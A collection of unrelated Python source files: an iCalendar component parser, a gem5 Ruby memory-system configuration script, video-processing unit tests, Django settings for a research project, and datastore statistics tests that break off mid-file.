wrapper_props.extend(x.props)
return x.subcomponents
else:
return [x]
components = chain(*(_get_item_components(x) for x in items2))
lines = chain(*uniq(tuple(x.dump_lines()) for x in components))
if wrapper_type is not None:
lines = chain(*(
[u'BEGIN:{}'.format(wrapper_type)],
# XXX: wrapper_props is a list of lines (with line-wrapping), so
# filtering out duplicate lines will almost certainly break
# multiline-values. Since the only props we usually need to
# support are PRODID and VERSION, I don't care.
uniq(wrapper_props),
lines,
[u'END:{}'.format(wrapper_type)]
))
return u''.join(line + u'\r\n' for line in lines)
def _get_item_type(components, wrappers):
i = 0
for component in components:
i += 1
try:
item_type = component.name
wrapper_type = wrappers[item_type]
except KeyError:
pass
else:
return item_type, wrapper_type
if not i:
return None, None
else:
raise ValueError('Not sure how to join components.')
class _Component(object):
'''
Raw outline of the components.
Vdirsyncer's operations on iCalendar and VCard objects are limited to
retrieving the UID and splitting larger files into items. Consequently this
parser is very lazy, with the downside that manipulation of item properties
are extremely costly.
Other features:
- Preserve the original property order and wrapping.
- Don't choke on irrelevant details like invalid datetime formats.
Original version from https://github.com/collective/icalendar/, but apart
from the similar API, very few parts have been reused.
'''
def __init__(self, name, lines, subcomponents):
'''
:param name: The component name.
:param lines: The component's own properties, as list of lines
(strings).
:param subcomponents: List of components.
'''
self.name = name
self.props = lines
self.subcomponents = subcomponents
@classmethod
def parse(cls, lines, multiple=False):
if isinstance(lines, bytes):
lines = lines.decode('utf-8')
if isinstance(lines, str):
lines = lines.splitlines()
stack = []
rv = []
try:
for _i, line in enumerate(lines):
if line.startswith(u'BEGIN:'):
c_name = line[len(u'BEGIN:'):].strip().upper()
stack.append(cls(c_name, [], []))
elif line.startswith(u'END:'):
component = stack.pop()
if stack:
stack[-1].subcomponents.append(component)
else:
rv.append(component)
else:
if line.strip():
stack[-1].props.append(line)
except IndexError:
raise ValueError('Parsing error at line {}'.format(_i + 1))
if multiple:
return rv
elif len(rv) != 1:
raise ValueError('Found {} components, expected one.'
.format(len(rv)))
else:
return rv[0]
def dump_lines(self):
yield u'BEGIN:{}'.format(self.name)
for line in self.props:
yield line
for c in self.subcomponents:
for line in c.dump_lines():
yield line
yield u'END:{}'.format(self.name)
def __delitem__(self, key):
prefix = (u'{}:'.format(key), u'{};'.format(key))
new_lines = []
lineiter = iter(self.props)
while True:
for line in lineiter:
if line.startswith(prefix):
break
else:
new_lines.append(line)
else:
break
for line in lineiter:
if not line.startswith((u' ', u'\t')):
new_lines.append(line)
break
self.props = new_lines
def __setitem__(self, key, val):
assert isinstance(val, str)
assert u'\n' not in val
del self[key]
line = u'{}:{}'.format(key, val)
self.props.append(line)
def __contains__(self, obj):
if isinstance(obj, type(self)):
return obj not in self.subcomponents and \
not any(obj in x for x in self.subcomponents)
elif isinstance(obj, str):
return self.get(obj, None) is not None
else:
raise ValueError(obj)
def __getitem__(self, key):
prefix_without_params = '{}:'.format(key)
prefix_with_params = '{};'.format(key)
iterlines = iter(self.props)
for line in iterlines:
if line.startswith(prefix_without_params):
rv = line[len(prefix_without_params):]
break
elif line.startswith(prefix_with_params):
rv = line[len(prefix_with_params):].split(':', 1)[-1]
break
else:
raise KeyError()
for line in iterlines:
if line.startswith((u' ', u'\t')):
rv += line[1:]
else:
break
return rv
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def __eq__(self, other):
return (
isinstance(other, type(self)) and
self.name == other.name and
self.props == other.props and
self.subcomponents == other.subcomponents
)
| |
# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
def define_options(parser):
# By default, ruby uses the simple timing cpu
parser.set_defaults(cpu_type="timing")
# ruby network options
parser.add_option("--topology", type="string", default="Crossbar",
help="check src/mem/ruby/network/topologies for complete set")
parser.add_option("--mesh-rows", type="int", default=1,
help="the number of rows in the mesh topology")
parser.add_option("--garnet-network", type="string", default=None,
help="'fixed'|'flexible'")
parser.add_option("--network-fault-model", action="store_true", default=False,
help="enable network fault model: see src/mem/ruby/network/fault_model/")
# ruby mapping options
parser.add_option("--numa-high-bit", type="int", default=0,
help="high order address bit to use for numa mapping. " \
"0 = highest bit, not specified = lowest bit")
# ruby sparse memory options
parser.add_option("--use-map", action="store_true", default=False)
parser.add_option("--map-levels", type="int", default=4)
parser.add_option("--recycle-latency", type="int", default=10,
help="Recycle latency for ruby controller input buffers")
parser.add_option("--random_seed", type="int", default=1234,
help="Used for seeding the random number generator")
parser.add_option("--ruby_stats", type="string", default="ruby.stats")
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
eval("%s.define_options(parser)" % protocol)
def create_topology(controllers, options):
""" Called from create_system in configs/ruby/<protocol>.py
Must return an object which is a subclass of BaseTopology
found in configs/topologies/BaseTopology.py
This is a wrapper for the legacy topologies.
"""
exec "import %s as Topo" % options.topology
topology = eval("Topo.%s(controllers)" % options.topology)
return topology
def create_system(options, system, piobus = None, dma_ports = []):
system.ruby = RubySystem(clock = options.clock,
stats_filename = options.ruby_stats,
no_mem_vec = options.use_map)
ruby = system.ruby
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
try:
(cpu_sequencers, dir_cntrls, topology) = \
eval("%s.create_system(options, system, piobus, dma_ports, ruby)"
% protocol)
except:
print "Error: could not create sytem for ruby protocol %s" % protocol
raise
# Create a port proxy for connecting the system port. This is
# independent of the protocol and kept in the protocol-agnostic
# part (i.e. here).
sys_port_proxy = RubyPortProxy(ruby_system = ruby)
# Give the system port proxy a SimObject parent without creating a
# full-fledged controller
system.sys_port_proxy = sys_port_proxy
# Connect the system port for loading of binaries etc
system.system_port = system.sys_port_proxy.slave
#
# Set the network classes based on the command line options
#
if options.garnet_network == "fixed":
class NetworkClass(GarnetNetwork_d): pass
class IntLinkClass(GarnetIntLink_d): pass
class ExtLinkClass(GarnetExtLink_d): pass
class RouterClass(GarnetRouter_d): pass
elif options.garnet_network == "flexible":
class NetworkClass(GarnetNetwork): pass
class IntLinkClass(GarnetIntLink): pass
class ExtLinkClass(GarnetExtLink): pass
class RouterClass(GarnetRouter): pass
else:
class NetworkClass(SimpleNetwork): pass
class IntLinkClass(SimpleIntLink): pass
class ExtLinkClass(SimpleExtLink): pass
class RouterClass(BasicRouter): pass
#
# Important: the topology must be instantiated before the network and after
# the controllers. Hence the separation between topology definition and
# instantiation.
#
# gem5 SimObject defined in src/mem/ruby/network/Network.py
net_topology = Topology()
net_topology.description = topology.description
routers, int_links, ext_links = topology.makeTopology(options,
IntLinkClass, ExtLinkClass, RouterClass)
net_topology.routers = routers
net_topology.int_links = int_links
net_topology.ext_links = ext_links
if options.network_fault_model:
assert(options.garnet_network == "fixed")
fault_model = FaultModel()
network = NetworkClass(ruby_system = ruby, topology = net_topology,\
enable_fault_model=True, fault_model = fault_model)
else:
network = NetworkClass(ruby_system = ruby, topology = net_topology)
#
# Loop through the directory controlers.
# Determine the total memory size of the ruby system and verify it is equal
# to physmem. However, if Ruby memory is using sparse memory in SE
# mode, then the system should not back-up the memory state with
# the Memory Vector and thus the memory size bytes should stay at 0.
# Also set the numa bits to the appropriate values.
#
total_mem_size = MemorySize('0B')
dir_bits = int(math.log(options.num_dirs, 2))
if options.numa_high_bit:
numa_bit = options.numa_high_bit
else:
# if not specified, use the lowest bits above the block offest
if dir_bits > 0:
# add 5 because bits 0-5 are the block offset
numa_bit = dir_bits + 5
else:
numa_bit = 6
for dir_cntrl in dir_cntrls:
total_mem_size.value += dir_cntrl.directory.size.value
dir_cntrl.directory.numa_high_bit = numa_bit
phys_mem_size = 0
for mem in system.memories.unproxy(system):
phys_mem_size += long(mem.range.second) - long(mem.range.first) + 1
assert(total_mem_size.value == phys_mem_size)
ruby_profiler = RubyProfiler(ruby_system = ruby,
num_of_sequencers = len(cpu_sequencers))
ruby.network = network
ruby.profiler = ruby_profiler
ruby.mem_size = total_mem_size
ruby._cpu_ruby_ports = cpu_sequencers
ruby.random_seed = options.random_seed
| |
import os
import stat
import tempfile
from mock import Mock, patch
from nose import SkipTest
from nose.tools import eq_
import waffle
from django.conf import settings
import mkt
import mkt.site.tests
from lib.video import dummy, ffmpeg, get_library, totem
from lib.video.tasks import resize_video
from mkt.developers.models import UserLog
from mkt.site.fixtures import fixture
from mkt.site.storage_utils import (copy_stored_file, local_storage,
private_storage)
from mkt.site.tests.test_utils_ import get_image_path
from mkt.users.models import UserProfile
from mkt.webapps.models import Preview, Webapp
files = {
'good': os.path.join(os.path.dirname(__file__),
'fixtures/disco-truncated.webm'),
'bad': get_image_path('mozilla.png'),
}
older_output = """
Input #0, matroska,webm, from 'lib/video/fixtures/disco-truncated.webm':
Duration: 00:00:10.00, start: 0.000000, bitrate: 298 kb/s
Stream #0:0(eng): Video: vp8, yuv420p, 640x360, SAR 1:1 DAR 16:9,
Stream #0:1(eng): Audio: vorbis, 44100 Hz, stereo, s16 (default)
"""
other_output = """
Input #0, matroska, from 'disco-truncated.webm':
Metadata:
doctype : webm
"""
totem_indexer_good = """
TOTEM_INFO_DURATION=10
TOTEM_INFO_HAS_VIDEO=True
TOTEM_INFO_VIDEO_WIDTH=640
TOTEM_INFO_VIDEO_HEIGHT=360
TOTEM_INFO_VIDEO_CODEC=VP8 video
TOTEM_INFO_FPS=25
TOTEM_INFO_HAS_AUDIO=True
TOTEM_INFO_AUDIO_BITRATE=128
TOTEM_INFO_AUDIO_CODEC=Vorbis
TOTEM_INFO_AUDIO_SAMPLE_RATE=44100
TOTEM_INFO_AUDIO_CHANNELS=Stereo
"""
totem_indexer_bad = """
TOTEM_INFO_HAS_VIDEO=False
TOTEM_INFO_HAS_AUDIO=False
"""
class TestFFmpegVideo(mkt.site.tests.TestCase):
def setUp(self):
self.video = ffmpeg.Video(files['good'])
if not ffmpeg.Video.library_available():
raise SkipTest
self.video._call = Mock()
self.video._call.return_value = older_output
def test_meta(self):
self.video.get_meta()
eq_(self.video.meta['formats'], ['matroska', 'webm'])
eq_(self.video.meta['duration'], 10.0)
eq_(self.video.meta['dimensions'], (640, 360))
def test_valid(self):
self.video.get_meta()
assert self.video.is_valid()
def test_dev_valid(self):
self.video._call.return_value = other_output
self.video.get_meta()
eq_(self.video.meta['formats'], ['webm'])
# These tests can be a little bit slow, to say the least so they are
# skipped. Un-skip them if you want.
def test_screenshot(self):
raise SkipTest
self.video.get_meta()
try:
screenshot = self.video.get_screenshot(mkt.ADDON_PREVIEW_SIZES[0])
assert os.stat(screenshot)[stat.ST_SIZE]
finally:
os.remove(screenshot)
def test_encoded(self):
raise SkipTest
self.video.get_meta()
try:
video = self.video.get_encoded(mkt.ADDON_PREVIEW_SIZES[0])
assert os.stat(video)[stat.ST_SIZE]
finally:
os.remove(video)
class TestBadFFmpegVideo(mkt.site.tests.TestCase):
def setUp(self):
self.video = ffmpeg.Video(files['bad'])
if not self.video.library_available():
raise SkipTest
self.video.get_meta()
def test_meta(self):
eq_(self.video.meta['formats'], ['image2'])
assert not self.video.is_valid()
def test_valid(self):
assert not self.video.is_valid()
def test_screenshot(self):
self.assertRaises(AssertionError, self.video.get_screenshot,
mkt.ADDON_PREVIEW_SIZES[0])
def test_encoded(self):
self.assertRaises(AssertionError, self.video.get_encoded,
mkt.ADDON_PREVIEW_SIZES[0])
class TestTotemVideo(mkt.site.tests.TestCase):
def setUp(self):
self.video = totem.Video(files['good'])
self.video._call_indexer = Mock()
def test_meta(self):
self.video._call_indexer.return_value = totem_indexer_good
self.video.get_meta()
eq_(self.video.meta['formats'], 'VP8')
eq_(self.video.meta['duration'], '10')
def test_valid(self):
self.video._call_indexer = Mock()
self.video._call_indexer.return_value = totem_indexer_good
self.video.get_meta()
assert self.video.is_valid()
def test_not_valid(self):
self.video._call_indexer.return_value = totem_indexer_bad
self.video.get_meta()
assert not self.video.is_valid()
@patch('lib.video.totem.Video.library_available')
@patch('lib.video.ffmpeg.Video.library_available')
@patch.object(settings, 'VIDEO_LIBRARIES',
['lib.video.totem', 'lib.video.ffmpeg'])
def test_choose(ffmpeg_, totem_):
ffmpeg_.return_value = True
totem_.return_value = True
eq_(get_library(), totem.Video)
totem_.return_value = False
eq_(get_library(), ffmpeg.Video)
ffmpeg_.return_value = False
eq_(get_library(), None)
class TestTask(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestTask, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.preview = Preview.objects.create(
addon=self.app, thumbnail_path=tempfile.mkstemp()[1],
image_path=tempfile.mkstemp()[1])
# Copy files to private storage where `resize_video` expects it.
self.tmp_good = tempfile.NamedTemporaryFile(suffix='.webm').name
self.tmp_bad = tempfile.NamedTemporaryFile(suffix='.png').name
copy_stored_file(files['good'], self.tmp_good,
src_storage=local_storage,
dst_storage=private_storage)
copy_stored_file(files['bad'], self.tmp_bad,
src_storage=local_storage,
dst_storage=private_storage)
def tearDown(self):
private_storage.delete(self.tmp_good)
private_storage.delete(self.tmp_bad)
super(TestTask, self).tearDown()
@patch('lib.video.tasks.Preview.delete')
@patch('lib.video.tasks._resize_video')
def test_resize_error(self, _resize_video, _preview_delete):
user = UserProfile.objects.create(email='a@a.com')
_resize_video.side_effect = ValueError
with self.assertRaises(ValueError):
resize_video(self.tmp_good, self.preview.pk, user_pk=user.pk,
lib=dummy.Video)
assert _preview_delete.called
assert UserLog.objects.filter(
user=user, activity_log__action=mkt.LOG.VIDEO_ERROR.id).exists()
@patch('lib.video.tasks.Preview.delete')
@patch('lib.video.tasks._resize_video')
def test_resize_failed(self, _resize_video, _preview_delete):
user = UserProfile.objects.create(email='a@a.com')
_resize_video.return_value = None
resize_video(self.tmp_good, self.preview.pk, user_pk=user.pk,
lib=dummy.Video)
assert _preview_delete.called
@patch('lib.video.tasks.Preview.save')
@patch('lib.video.ffmpeg.Video.get_encoded')
def test_resize_video_no_encode(self, get_encoded, _preview_save):
waffle.models.Switch.objects.update(name='video-encode', active=False)
resize_video(self.tmp_good, self.preview.pk, lib=dummy.Video)
assert not get_encoded.called
assert _preview_save.called
@patch('lib.video.tasks.Preview.save')
@patch('lib.video.totem.Video.get_encoded')
def test_resize_video(self, get_encoded, _preview_save):
name = tempfile.mkstemp()[1]
get_encoded.return_value = name
resize_video(self.tmp_good, self.preview.pk, lib=dummy.Video)
assert _preview_save.called
@patch('lib.video.tasks.Preview.save')
def test_resize_image(self, _preview_save):
resize_video(self.tmp_bad, self.preview.pk, lib=dummy.Video)
eq_(self.preview.sizes, {})
assert not _preview_save.called
| |
"""
Django settings for daphne_brain project.
Generated by 'django-admin startproject' using Django 1.10.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'aaaaa'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['3.128.235.245', 'localhost', '127.0.0.1', 'www.selva-research.com',
'selva-research.engr.tamu.edu', 'dev.selva-research.com', 'daphne', 'daphne_brain'
'daphne-at-dev.selva-research.com', 'daphne-at.selva-research.com']
USE_X_FORWARDED_HOST = True
# ACTIVE_MODULES = ['EDL', 'EOSS', 'AT', 'example_problem']
ACTIVE_MODULES = ['EOSS']
EDL_PATH = '/Users/ssantini/Code/'
# Application definition
INSTALLED_APPS = [
'channels',
'corsheaders',
'daphne_context',
'example_problem',
'EOSS',
'EDL',
'AT',
'auth_API',
'experiment',
'experiment_at',
'iFEED_API',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework'
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'daphne_brain.tamu_subdomains_session.TamuSubdomainsSessionMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'daphne_brain.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'daphne_brain.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'daphne',
'USER': os.environ['USER'],
'PASSWORD': os.environ['PASSWORD'],
'HOST': os.environ['POSTGRES_HOST'],
'PORT': os.environ['POSTGRES_PORT'],
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# CORS & CSRF
CORS_ORIGIN_WHITELIST = (
'http://daphne.engr.tamu.edu',
'http://localhost:8080',
'http://dev.selva-research.com'
)
CORS_ALLOW_CREDENTIALS = True
CSRF_TRUSTED_ORIGINS = (
'http://daphne.engr.tamu.edu',
'http://localhost:8080',
'http://dev.selva-research.com'
)
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [(os.environ['REDIS_HOST'], os.environ['REDIS_PORT'])],
}
},
}
# ASGI_APPLICATION should be set to your outermost router
ASGI_APPLICATION = 'daphne_brain.asgi.application'
# Databases for Daphne
ALCHEMY_DATABASE = {
'drivername': 'postgresql+psycopg2',
'host': os.environ['POSTGRES_HOST'],
'port': os.environ['POSTGRES_PORT'],
'username': os.environ['USER'],
'password': os.environ['PASSWORD'],
'database': 'daphne'
}
EDL_DATABASE = {
'drivername': 'postgresql+psycopg2',
'host': os.environ['POSTGRES_HOST'],
'port': os.environ['POSTGRES_PORT'],
'username': os.environ['USER'],
'password': os.environ['PASSWORD'],
'database': 'edldatabase'
}
ECLSS_DATABASE = {
'drivername': 'postgres',
'host': 'www.selva-research.com',
'port': '5432',
'username': os.environ['SQL_USER'],
'password': os.environ['SQL_PASSWORD'],
'database': 'eclss'
}
# Session configuration
# SESSION_ENGINE = "merge_session.merge_db"
# Email
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEFAULT_FROM_EMAIL = 'Daphne Admin <daphne@selva-research.com>'
# AWS
DEPLOYMENT_TYPE = os.environ['DEPLOYMENT_TYPE']
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '[%(asctime)s] - %(name)s - %(levelname)s - %(message)s'
},
'standard': {
'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt': "%Y/%m/%d %H:%M:%S"
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': BASE_DIR + '/logs/daphne.log',
'formatter': 'standard',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'standard',
},
'null': {
'class': 'logging.NullHandler',
},
},
'loggers': {
'django': {
'handlers': ['file', 'console'],
'level': 'ERROR',
'propagate': True,
},
'iFEED': {
'handlers': ['file', 'console'],
'level': 'ERROR',
'propagate': True,
},
'VASSAR': {
'handlers': ['file', 'console'],
'level': 'ERROR',
'propagate': True,
},
'critic': {
'handlers': ['file', 'console'],
'level': 'ERROR',
'propagate': True,
},
'data-mining': {
'handlers': ['file', 'console'],
'level': 'ERROR',
'propagate': True,
},
'debugging': {
'handlers': ['file', 'console'],
'level': 'DEBUG',
'propagate': True,
},
'config': {
'handlers': ['file', 'console'],
'level': 'ERROR',
'propagate': True,
},
},
}
| |
#
# Copyright 2008 The ndb Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for stats.py."""
import datetime
import os
from .google_imports import datastore
from .google_test_imports import unittest
from . import stats
from . import test_utils
class StatsTests(test_utils.NDBTest):
def setUp(self):
"""Setup test infrastructure."""
super(StatsTests, self).setUp()
self.PopulateStatEntities()
the_module = stats
def PopulateStatEntities(self):
"""Insert stat entities into Cloud Datastore."""
# GlobalStat
self.CreateStatEntity(stats.GlobalStat.STORED_KIND_NAME,
has_entity_bytes=True,
has_builtin_index_stats=True,
has_composite_index_stats=True)
# NamespaceStat
self.CreateStatEntity(stats.NamespaceStat.STORED_KIND_NAME,
subject_namespace='name-space',
has_entity_bytes=True,
has_builtin_index_stats=True,
has_composite_index_stats=True)
# KindStat
self.CreateStatEntity(stats.KindStat.STORED_KIND_NAME, 'foo',
has_entity_bytes=True,
has_builtin_index_stats=True,
has_composite_index_stats=True)
self.CreateStatEntity(stats.KindStat.STORED_KIND_NAME, 'foo2',
has_entity_bytes=True,
has_builtin_index_stats=True,
has_composite_index_stats=True)
# KindRootEntityStat
self.CreateStatEntity(stats.KindRootEntityStat.STORED_KIND_NAME, 'foo3',
has_entity_bytes=True)
self.CreateStatEntity(stats.KindRootEntityStat.STORED_KIND_NAME, 'foo4',
has_entity_bytes=True)
# KindNonRootEntityStat
self.CreateStatEntity(stats.KindNonRootEntityStat.STORED_KIND_NAME, 'foo5',
has_entity_bytes=True)
self.CreateStatEntity(stats.KindNonRootEntityStat.STORED_KIND_NAME, 'foo6',
has_entity_bytes=True)
# PropertyTypeStat
self.CreateStatEntity(stats.PropertyTypeStat.STORED_KIND_NAME,
property_type='pt1',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(stats.PropertyTypeStat.STORED_KIND_NAME,
property_type='pt2',
has_entity_bytes=True,
has_builtin_index_stats=True)
# KindPropertyTypeStat
self.CreateStatEntity(stats.KindPropertyTypeStat.STORED_KIND_NAME,
kind_name='foo1',
property_type='pt1',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(stats.KindPropertyTypeStat.STORED_KIND_NAME,
kind_name='foo1',
property_type='pt2',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(stats.KindPropertyTypeStat.STORED_KIND_NAME,
kind_name='foo2',
property_type='pt2',
has_entity_bytes=True,
has_builtin_index_stats=True)
# KindPropertyNameStat
self.CreateStatEntity(stats.KindPropertyNameStat.STORED_KIND_NAME,
kind_name='foo11',
property_name='pn1',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(stats.KindPropertyNameStat.STORED_KIND_NAME,
kind_name='foo11',
property_name='pn2',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(stats.KindPropertyNameStat.STORED_KIND_NAME,
kind_name='foo21',
property_name='pn2',
has_entity_bytes=True,
has_builtin_index_stats=True)
# KindPropertyNamePropertyTypeStat
self.CreateStatEntity(
stats.KindPropertyNamePropertyTypeStat.STORED_KIND_NAME,
kind_name='foo12',
property_type='pt1',
property_name='pn1',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(
stats.KindPropertyNamePropertyTypeStat.STORED_KIND_NAME,
kind_name='foo12',
property_type='pt2',
property_name='pn2',
has_entity_bytes=True,
has_builtin_index_stats=True)
self.CreateStatEntity(
stats.KindPropertyNamePropertyTypeStat.STORED_KIND_NAME,
kind_name='foo22',
property_type='pt2',
property_name='pn2',
has_entity_bytes=True,
has_builtin_index_stats=True)
# KindCompositeIndexStat
self.CreateStatEntity(
stats.KindCompositeIndexStat.STORED_KIND_NAME,
kind_name='foo12',
composite_index_id=1)
self.CreateStatEntity(
stats.KindCompositeIndexStat.STORED_KIND_NAME,
kind_name='foo12',
composite_index_id=2)
self.CreateStatEntity(
stats.KindCompositeIndexStat.STORED_KIND_NAME,
kind_name='foo22',
composite_index_id=3)
def CreateStatEntity(self,
kind,
kind_name=None,
property_type=None,
property_name=None,
subject_namespace=None,
composite_index_id=None,
has_entity_bytes=None,
has_builtin_index_stats=None,
has_composite_index_stats=None):
"""Create a single Statistic datastore entity.
Args:
kind: The name of the kind to store.
kind_name: The value of the 'kind_name' property to set on the entity.
property_type: The value of the 'property_type' property to set on the
entity.
property_name: The value of the 'property_name' property to set on the
entity.
subject_namespace: The namespace for NamespaceStat entities.
composite_index_id: The index id of composite index.
has_entity_bytes: The stat has the entity_bytes property.
has_builtin_index_stats: The stat entity has builtin_index_bytes and
builtin_index_count.
has_composite_index_stats: The stat entity has composite_index_bytes and
composite_index_count.
"""
stat = datastore.Entity(kind)
stat['bytes'] = 4
stat['count'] = 2
stat['timestamp'] = datetime.datetime.utcfromtimestamp(40)
if has_entity_bytes:
stat['entity_bytes'] = 2
if has_builtin_index_stats:
stat['builtin_index_count'] = 3
stat['builtin_index_bytes'] = 1
if has_composite_index_stats:
stat['composite_index_count'] = 2
stat['composite_index_bytes'] = 1
if kind_name is not None:
stat['kind_name'] = kind_name
if property_type is not None:
stat['property_type'] = property_type
if property_name is not None:
stat['property_name'] = property_name
if subject_namespace is not None:
stat['subject_namespace'] = subject_namespace
if composite_index_id is not None:
stat['index_id'] = composite_index_id
datastore.Put(stat)
def testGlobalStat(self):
"""Test fetching the global stat singleton."""
res = stats.GlobalStat.query().fetch()
self.assertEquals(1, len(res))
self.assertEquals(4, res[0].bytes)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
self.assertEquals(2, res[0].composite_index_count)
self.assertEquals(1, res[0].composite_index_bytes)
def testNamespaceStat(self):
"""Test fetching the global stat singleton."""
res = stats.NamespaceStat.query().fetch()
self.assertEquals(1, len(res))
self.assertEquals(4, res[0].bytes)
self.assertEquals('name-space', res[0].subject_namespace)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
self.assertEquals(2, res[0].composite_index_count)
self.assertEquals(1, res[0].composite_index_bytes)
def testKindStat(self):
"""Test fetching the Kind stats."""
res = stats.KindStat.query().fetch()
self.assertEquals(2, len(res))
self.assertEquals('foo', res[0].kind_name)
self.assertEquals('foo2', res[1].kind_name)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
self.assertEquals(2, res[0].composite_index_count)
self.assertEquals(1, res[0].composite_index_bytes)
def testKindRootEntityStat(self):
